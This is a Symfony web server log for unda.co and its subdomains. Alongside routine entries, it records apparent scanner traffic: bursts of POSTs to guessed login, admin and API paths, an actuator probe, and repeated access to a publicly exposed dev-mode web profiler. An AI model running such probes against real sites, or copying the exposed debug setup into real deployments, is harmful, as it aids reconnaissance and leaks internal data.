[2025-12-16 06:19:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:19:53] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 06:20:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
[2025-12-16 06:20:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 06:39:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:44:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=52.167.144.161&limit=10","method":"GET"} []
[2025-12-16 06:44:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=52.167.144.161&limit=10","method":"GET"} []
[2025-12-16 06:45:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=146.19.24.116&limit=10&method=POST","method":"GET"} []
[2025-12-16 06:45:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=POST","method":"GET"} []
[2025-12-16 06:47:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 06:47:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-16 06:47:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /formaction"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /formaction\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/callback"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/callback\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dashboard"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dashboard\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /admin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /admin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /account"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /account\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /settings"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /settings\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/user"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/user\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:47:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /submit"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /submit\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 06:56:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 06:58:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 06:58:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 06:58:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 06:58:04] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 06:58:04] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 06:58:04] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 06:58:04] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 06:58:37] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 06:59:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 06:59:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 06:59:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 06:59:05] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 06:59:05] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 06:59:05] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 06:59:05] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 07:10:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 07:10:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=db","method":"GET"} []
[2025-12-16 07:10:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-16 07:10:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 07:10:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 07:10:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 07:10:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 07:10:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 07:10:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 07:10:30] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 07:11:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 07:11:26] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 07:11:26] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 07:11:26] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 07:11:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 07:11:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 07:11:27] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 07:21:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02d2e2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/02d2e2?panel=validator","method":"GET"} []
[2025-12-16 07:21:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-16 07:31:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
[2025-12-16 07:31:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
[2025-12-16 07:37:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f8d329","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f8d329?panel=request","method":"GET"} []
[2025-12-16 07:37:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 07:51:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 07:55:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"259531","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/259531?panel=logger","method":"GET"} []
[2025-12-16 07:55:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-16 07:57:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
[2025-12-16 07:57:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-16 07:59:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a238bb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a238bb?panel=router","method":"GET"} []
[2025-12-16 07:59:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-16 08:00:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=cache","method":"GET"} []
[2025-12-16 08:00:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 08:34:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e1311c","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/e1311c?panel=time","method":"GET"} []
[2025-12-16 08:34:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 08:35:32] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-16 08:35:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 08:35:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 08:35:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 08:35:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 08:35:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 08:35:32] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 08:35:33] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-16 08:35:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 08:35:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 08:35:33] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 08:35:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 08:35:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 08:35:33] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 08:35:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
